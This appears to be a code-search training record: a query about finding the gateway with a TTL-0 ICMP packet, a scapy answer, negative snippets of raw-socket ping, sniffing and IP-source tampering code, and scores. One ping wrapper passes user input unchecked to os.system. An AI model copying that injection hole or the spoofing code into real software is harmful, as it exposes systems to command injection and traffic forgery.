max_traff_attempts:\n if isinstance(results_icmp, dict):\n print \"Wait for 10 secs before the next ICMP retry\\n\"\n sleep(10)\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt += 1\n else:\n break\n if attempt == max_traff_attempts:\n return {'ICMP': results_icmp.keys()}\n if proto == 'tcp':\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry = 1\n while retry < max_traff_attempts:\n if isinstance(results_tcp, dict):\n print \"Wait for 10 secs before the next TCP retry\\n\"\n sleep(10)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry += 1\n else:\n break\n if retry == max_traff_attempts:\n return {'TCP': results_tcp.keys()}", "def sniff_traffic(hs, count, timeout, recipient_type, pkt_type,\n exp_src, exp_dst, testlog):\n iface = hs.ports['eth1']\n\n # If host is NVP, sniff using a filter that checks for UDP packets\n if (\"NVP\" in recipient_type):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, recipient_type, pkt_type,\n exp_src, exp_dst, testlog)\n # If host is AVP, sniff using a filter that checks for Ethernet packets\n elif (\"AVP\" in recipient_type):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, recipient_type, pkt_type,\n exp_src, exp_dst, testlog)", "def send(self, data):\n print \"Attempting to send packet of size %d to %s\" % (len(data), self.hostname)\n self.sock.sendto(data, (self.dst_ip, 0))", "def test_tamper_ip(logger):\n packet = layers.packet.Packet(IP(src='127.0.0.1', dst='127.0.0.1')/TCP(sport=2222, dport=3333, seq=100, ack=100, flags=\"S\"))\n original = copy.deepcopy(packet)\n tamper = actions.tamper.TamperAction(None, field=\"src\", tamper_type=\"replace\", tamper_value=\"192.168.1.1\", tamper_proto=\"IP\")\n lpacket, rpacket = tamper.run(packet, logger)\n assert not rpacket, \"Tamper must not return right child\"\n assert lpacket, \"Tamper must give a left child\"\n assert id(lpacket) == id(packet), \"Tamper must edit in place\"\n\n # Confirm tamper replaced the field it was supposed to\n assert packet[IP].src == \"192.168.1.1\", \"Tamper did not replace flags.\"\n\n # Confirm tamper didn't corrupt anything in the TCP header\n assert confirm_unchanged(packet, original, TCP, [])\n\n # Confirm tamper didn't corrupt anything else in the IP header\n assert confirm_unchanged(packet, original, IP, [\"src\"])", "def get_ICMP_echo(payload_size, seq):\r\n icmp_type = 8\r\n icmp_code = 0\r\n init_checksum = 0\r\n icmp_id = random.randint(0, 0xFFFF)\r\n icmp_seq = seq\r\n _checksum = struct.pack(\"!BBHHH\", icmp_type, icmp_code, init_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n payload = \"\"\r\n for i in range(payload_size):\r\n payload += 'a'\r\n payload = bytes(payload, 'utf-8')\r\n\r\n icmp_checksum = get_checksum(_checksum + payload)\r\n\r\n header = struct.pack(\"!BBHHH\", icmp_type, icmp_code, icmp_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n return header + payload", "def send_error(self, conn, msg, srcif):\n message = {}\n message[SRCE], message[DEST] = ('.').join(srcif.split('.', 3)[:3]) + '.1', msg[SRCE]\n message[TYPE] = NRTE\n message[MESG] = {}\n sending_msg = json.dumps(message).encode()\n conn.sendall(sending_msg)\n return True" ]
[ "0.7043539", "0.6484077", "0.64424086", "0.6386618", "0.63455755", "0.6326406", "0.6275683", "0.62598705", "0.6095228", "0.5987131", "0.59356433", "0.58306605", "0.5739227", "0.57313937", "0.5700737", "0.56921375", "0.5688917", "0.5655082", "0.56411165", "0.56379056", "0.56274575", "0.5626001", "0.56183034", "0.56174517", "0.56109244", "0.55871266", "0.5584417", "0.5576894", "0.55734235", "0.5572032", "0.5555485", "0.5535834", "0.55081713", "0.55011475", "0.5480058", "0.5478358", "0.5468336", "0.54563195", "0.54396003", "0.5409106", "0.53962207", "0.5375894", "0.5372092", "0.53657633", "0.5352276", "0.5351779", "0.5346236", "0.53227514", "0.52958226", "0.5288484", "0.5264403", "0.5256296", "0.524922", "0.524199", "0.5241964", "0.52352566", "0.5228903", "0.5228137", "0.52138597", "0.52128637", "0.52080184", "0.5194912", "0.5167124", "0.5164993", "0.5159728", "0.5156408", "0.51518965", "0.51489943", "0.51475686", "0.5133485", "0.5133084", "0.5129621", "0.51287967", "0.51277846", "0.5110069", "0.510741", "0.5103767", "0.5096733", "0.5091971", "0.5085295", "0.50850314", "0.5078336", "0.50782835", "0.5076941", "0.50707746", "0.50650585", "0.5053772", "0.5031197", "0.5030874", "0.5011344", "0.499699", "0.49937946", "0.49873137", "0.49859846", "0.4983199", "0.49817714", "0.4977811", "0.49667922", "0.49648622", "0.49610057", "0.49548438" ]
0.0
-1
send echo pck when the ttl is 0 so when it arrive to the GW he send me back a TTL ERROR (ICMP MESSEGE) , the src is the GW
def get_GW(): p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0) return p.src
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_one_ping(mySocket, destIP, myID, mySeqNumber, packet_size):\n \n myChecksum = 0 # contador da soma de verificação\n\n # Faça um cabeçalho fictício com uma soma de verificação 0\n # Retorne uma string contendo os valores compactados de acordo com o formato especificado. \n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n padBytes = []\n startVal = 0x42\n \n for i in range(startVal, startVal + (packet_size-8)):\n padBytes += [(i & 0xff)] # Mantenha os caracteres no intervalo de 0 a 255\n data = bytearray(padBytes)\n\n # Calculo a soma de verificação nos dados e no cabeçalho fictício.\n myChecksum = checksum(header + data) # A soma de verificação está em ordem de rede\n\n # Agora que temos a soma de verificação correta, colocamos isso. \n # É apenas mais fácil, para criar um novo cabeçalho do que colocá-lo no modelo.\n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n # pacotes com a integridade dos dados verificada e com cabeçalho checksum adicionado.\n packet = header + data\n\n sendTime = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n try:\n \"\"\" \n socket.sendto(bytes, address)\n Retornar o número de bytes enviados.\n \"\"\"\n mySocket.sendto(packet, (destIP, 1))\n except socket.error as e:\n print(\"Falha Geral (%s)\" % (e.args[1]))\n return\n\n return sendTime", "def pinger(dst):\n icmpId = 0x4711\n for i in range(MAX_NUM_PROBES):\n # Erzeuge das ICMP Echo Anfrage-Paket (type=8).\n # Der Parameter seq ist ein Zaehler fuer die Anfrage-Pakete.\n icmpPkt = ICMP() # Hier muss ergaenzt werden!\n \"\"\"\n scapy liefert die Klasse ICMP mit der ein ICMP-Paket erzeugt werden kann.\n Es hat die folgenden Felder:\n >>> i = ICMP()\n >>> i.default_fields\n {'addr_mask': '0.0.0.0',\n 'chksum': None,\n 'code': 0,\t\t\t# \n 'gw': '0.0.0.0',\n 'id': 0,\n 'length': 0,\n 'nexthopmtu': 0,\n 'ptr': 0,\n 'reserved': 0,\n 'seq': 0,\n 'ts_ori': 70195301,\n 'ts_rx': 70195301,\n 'ts_tx': 70195301,\n 'type': 8, # echo request\n 'unused': 0}\n\n Ueberlegen Sie, welche Felder Sie beim Erzeugen der ICMP-Instanz mit welchen\n Werten versehen muessen. Die Parameteruebergabe funktioniert mit\n Parametername=Parameterwert, also z.B.:\n ICMP(type=5, code=3, ...)\n \"\"\"\n\n # Nun wird das Anfragepaket erzeugt. Die unterste Schicht, die wir hier angeben muessen \n # ist IP (die Vermittlungsschicht). Um alle Schichten darunter kuemmert sich scapy bzw.\n # das Betriebssystem. \n # Dem IP-Paket geben wir als Ziel-IP-Adresse den Wert der Variable dst an. Scapy kuemmert\n # sich automatisch darum, eine passende Quell-IP-Adresse zu verwenden.\n # Die Schichtung von Paketen erfolgt mit Hilfe des Schraegstrich-Operators '/'.\n ipPkt = IP(dst=dst)\n req = ipPkt/icmpPkt\n\n # Gib eine Zusammenfassung des fertigen Pakets aus\n req.show2()\n\n # Die einfachste Art der Implementierung nutzt die Funktion sr() von scapy.\n # Der Name sr() steht dabei fuer `send` und `receive`, also `sende` und `empfange`.\n # Informationen zu sr() finden Sie hier: \n # https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr\n # Warte maximal 5 Sekunden auf eine Antwort (timeout=5).\n ans, unans = sr(req, timeout=5, verbose=0)\n # Gib eine einzeilige Zusammenfassung von Anfrage und Antwort aus\n ans.summary()\n # Warte 0.9 Sekunden bis zur naechsten Iteration\n time.sleep(0.9)", "def atraso(myStats, destIP, hostname, timeout, mySeqNumber, packet_size, quiet=False):\n delay = None\n \n \"\"\"\n socket.AF_INET, é uma string que representa um nome de host na notação de domínio da Internet \n como 'daring.cwi.nl' ou um endereço IPv4 como '100.50.200.5' e porta é um inteiro.\"\"\"\n \"\"\"\n socket.getprotobyname(protocolname), Traduz um nome de protocolo da Internet (por exemplo, 'icmp') \n para uma constante adequada para passar como o terceiro argumento (opcional) \n para a função socket (). Isso geralmente é necessário apenas para soquetes abertos \n no modo \"bruto\" (SOCK_RAW); para os modos normais de soquete, o protocolo correto é \n escolhido automaticamente se o protocolo for omitido ou zero.\n \"\"\"\n\n try: \n mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error as e:\n print(\"Falhou!!!. (Erro de socket: '%s')\" % e.args[1])\n\n my_ID = os.getpid() & 0xFFFF # retorna a identificação do processo atual.\n\n sentTime = send_one_ping(mySocket, destIP, my_ID, mySeqNumber, packet_size) # retorna o tempo enviado\n if sentTime == None:\n mySocket.close()\n return delay\n\n myStats.pktsSent += 1 # contador de pacotes enviados\n\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL = receive_one_ping(\n mySocket, my_ID, timeout) \n mySocket.close()\n\n if recvTime: # tempo de resposta for verdadeiro\n delay = (recvTime-sentTime)*1000 # tempo de resposta - tempo de envio = delay(ms)\n if not quiet:\n # exibição das respostas do ping\n responseServer = {'bytes': dataSize, 'ip': socket.inet_ntoa(struct.pack(\"!I\", iphSrcIP)), 'sequencia': icmpSeqNumber, 'ttl': iphTTL, 'tempo': round(delay,2)}\n listResponse.append(responseServer)\n\n\n myStats.pktsRcvd += 1 # contador de pacotes recebidos\n myStats.totTime += delay # contador do tempo total (todos os times desse host) \n if myStats.minTime > delay:\n myStats.minTime = delay # contador tempo mínimo\n if myStats.maxTime < delay: \n myStats.maxTime = delay # contador tempo máximo\n else:\n delay = None\n print(\"Requesição excedeu o tempo limite.\")\n\n return delay", "def do_one(dest_addr, timeout, icmp = 1):\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error as e:\n if e.errno == 1:\n # Operation not permitted\n e.msg = e.msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(e.msg)\n raise # raise the original error\n\n my_id = os.getpid() & 0xFFFF\n\n send_one_ping(my_socket, dest_addr, my_id)\n delay = receive_one_ping(my_socket, my_id, timeout)\n\n my_socket.close()\n return delay", "def do_one(dest_addr, timeout):\n icmp = socket.getprotobyname(\"icmp\")\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted\n msg = msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(msg)\n raise # raise the original error\n \n my_ID = os.getpid() & 0xFFFF\n \n send_one_ping(my_socket, dest_addr, my_ID)\n delay = receive_one_ping(my_socket, my_ID, timeout)\n \n my_socket.close()\n return delay", "def send_ttl_expire(s, in_eth, in_ip, payload):\n saddr = ttl2ip(in_ip.ttl, in_ip.daddr)\n\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=5,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=saddr,\n daddr=in_ip.saddr,\n )\n icmp = icmphdr(11, 0, 0, 0, 0)\n\n ip.tot_len = len(ip) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(len(eth) + len(ip) + len(icmp) + len(payload))\n msg = bytearray(eth) + bytearray(ip) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def reply_icmp(self, datapath, srcMac, dstMac, srcIp, dstIp, ttl, type, id,\n seq, data, inPort):\n\n router_port = self.get_router_port_by_gateway_ip(datapath.id, dstIp)\n if router_port:\n # dstIp is the IP of one of the router ports\n # -> replay\n # data already available\n send_src_mac = dstMac\n send_dst_mac = srcMac\n send_src_ip = dstIp\n send_dst_ip = srcIp\n send_port = inPort\n self.send_icmp(datapath, send_src_mac, send_src_ip, send_dst_mac,\n send_dst_ip, send_port, seq, data, id, 0, ttl)\n LOG.debug(\"send icmp echo reply %s => %s (port%d)\"\n % (send_src_mac, send_dst_mac, send_port))\n\n else:\n # if in own net.\n matching_port = self.get_port_by_ip(datapath, dstIp)\n if matching_port:\n # send ARP request opcode =1\n # A flow rule is created when receiving the arp reply from client\n # self.send_arp(datapath, 1, matching_port.mac, str(matching_port.gateway_ip), \"00:00:00:00:00:00\", dstIp,\n # int(matching_port.port_no))\n pass\n else:\n print (\"Forward ICMP to matching network\")\n out_port, new_src_mac, new_dst_mac = self.get_next_hop(dpid=datapath.id, dstIP=dstIp)\n if out_port and new_dst_mac and new_dst_mac:\n self.add_flow_gateway_for_ip(datapath, int(out_port), dstIp, new_src_mac, new_dst_mac)\n # self.add_flow_gateway(datapath,ether.ETH_TYPE_IP, new_src_mac,new_dst_mac,int(out_port),dstIp)\n\n return 0", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def scapy_create_send_ICMP(self, ipdst):\n ip_header = self.define_ip_header(dst=ipdst)\n icmp_header = self.define_icmp_header()\n send(ip_header/icmp_header, count = DEFAULT_PACKET_DURATION)", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def send_echo_reply(s, in_eth, in_ip, payload):\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=in_ip.ihl,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=in_ip.daddr,\n daddr=in_ip.saddr,\n )\n ipopts = payload[0 : ip.ihl * 4 - len(ip)]\n icmp = icmphdr.from_buffer_copy(payload[len(ipopts) :])\n\n icmp.type = 0\n icmp.code = 0\n icmp.checksum = 0\n\n payload = payload[len(ipopts) + len(icmp) :]\n ip.tot_len = len(ip) + len(ipopts) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip) + bytearray(ipopts))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(\n len(eth) + len(ip) + len(ipopts) + len(icmp) + len(payload)\n )\n msg = bytearray(eth) + bytearray(ip) + bytearray(ipopts) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def do(self):\n from sys import exc_info\n try: # One could use UDP here, but it's obscure\n current_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted - Add more information to traceback\n etype, evalue, etb = exc_info()\n evalue = etype(\n \"%s - Note that ICMP messages can only be send from processes running as root.\" % evalue\n )\n raise etype, evalue, etb\n raise # raise the original error\n self.seq_number += 1\n send_time = self.send_one_ping(current_socket)\n if send_time == None:\n return\n\n receive_time, packet_size, ip, ip_header, icmp_header = self.receive_one_ping(current_socket)\n current_socket.close()\n\n if receive_time:\n return (receive_time - send_time) * 1000.0", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def ping(cmd, *args, **argv):\n import os\n context = argv[\"context\"]\n \n def count(num):\n if str(num) == str(int(num)):\n if num < 0:\n context.write(\"%s: bad number of packets to transmit.\" % cmd)\n else:\n return num\n else:\n context.write(\"%s: can't set unicast time-to-live: Unknown host\" % cmd)\n return\n\n ping_p = {\"-c\":count}\n\n def isipaddress(ip):\n import socket\n try:\n ipa = socket.gethostbyname(ip)\n return ipa\n except:\n context.write(\"ping: unknown host %s\" % ip)\n return None\n\n def doping(cmd, sign, sign_param, ipaddress):\n if sign in ping_p.keys():\n # #\n pass\n else:\n context.write(\"connect: Unknown host\")\n return \n \n\tif ping_p[sign](sign_param):\n # #\n pass\n else:\n return \n if isipaddress(ipaddress):\n ip = isipaddress(ipaddress)\n else:\n return\n try:\n os.system(str(cmd) + \" \" + str(sign) + \" \" + str(sign_param) + \" \" + str(ip))\n except:\n context.write(\"has some errors in ping command\")\n return \n\n length = len(args)\n \n if length == 0:\n helpinfo = context.resolver.get_func_doc(getattr(context.resolver.get_module(cmd), cmd))\n helpinfo_format = helpinfo[\"format\"].rstrip()\n helpinfo_format = helpinfo_format.lstrip()\n if helpinfo_format == \"\":\n return\n context.write(helpinfo_format)\n\n elif length < 3:\n cmd_real = context.resolver.has_command(args[0], cmd)\n if cmd_real != None:\n cmds = cmd.split()\n cmd_n = \"_\".join(cmds)\n modulename = cmd_n + \"_\" + cmd_real\n module = context.resolver.get_module(modulename)\n func = getattr(module, modulename)\n func(cmd + \" \" + cmd_real, context = context)\n else:\n doping(cmd, \"-c\", 4, args[0])\n\n else:\n\tif args[1] == \"0\":\n\t os.system(str(cmd) + \" \" + str(args[2]))\n\telse:\n doping(cmd, args[0], args[1], args[2])", "def spoof_packet(packet):", "def receive_one_ping(self, current_socket):\n import select\n from struct import pack, unpack\n\n class HeaderInformation(dict):\n \"\"\" Simple storage received IP and ICMP header informations \"\"\"\n def __init__(self, names, struct_format, data):\n unpacked_data = unpack(struct_format, data)\n dict.__init__(self, dict(zip(names, unpacked_data)))\n\n ICMP_MAX_RECV = 2048 # Max size of incoming buffer\n timeout = self.timeout / 1000.0\n\n while True: # Loop while waiting for packet or timeou+t\n select_start = self.timer()\n inputready, outputready, exceptready = select.select([current_socket], [], [], timeout)\n select_duration = (self.timer() - select_start)\n if inputready == []: # timeout\n return None, 0, 0, 0, 0\n\n receive_time = self.timer()\n\n packet_data, address = current_socket.recvfrom(ICMP_MAX_RECV)\n\n icmp_header = HeaderInformation(\n names=[\n \"type\", \"code\", \"checksum\",\n \"packet_id\", \"seq_number\"\n ],\n struct_format=\"!BBHHH\",\n data=packet_data[20:28]\n )\n\n if icmp_header[\"packet_id\"] == self.own_id: # Our packet\n ip_header = HeaderInformation(\n names=[\n \"version\", \"type\", \"length\",\n \"id\", \"flags\", \"ttl\", \"protocol\",\n \"checksum\", \"src_ip\", \"dest_ip\"\n ],\n struct_format=\"!BBHHHBBHII\",\n data=packet_data[:20]\n )\n packet_size = len(packet_data) - 28\n ip = socket.inet_ntoa(pack(\"!I\", ip_header[\"src_ip\"]))\n # XXX: Why not ip = address[0] ???\n return receive_time, packet_size, ip, ip_header, icmp_header\n\n timeout = timeout - select_duration\n if timeout <= 0:\n return None, 0, 0, 0, 0", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def test_nmap_icmp_echo_request(self):\n assert_equal(self.test_nmap.ICMP_ECHO_REQUEST, 8)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for 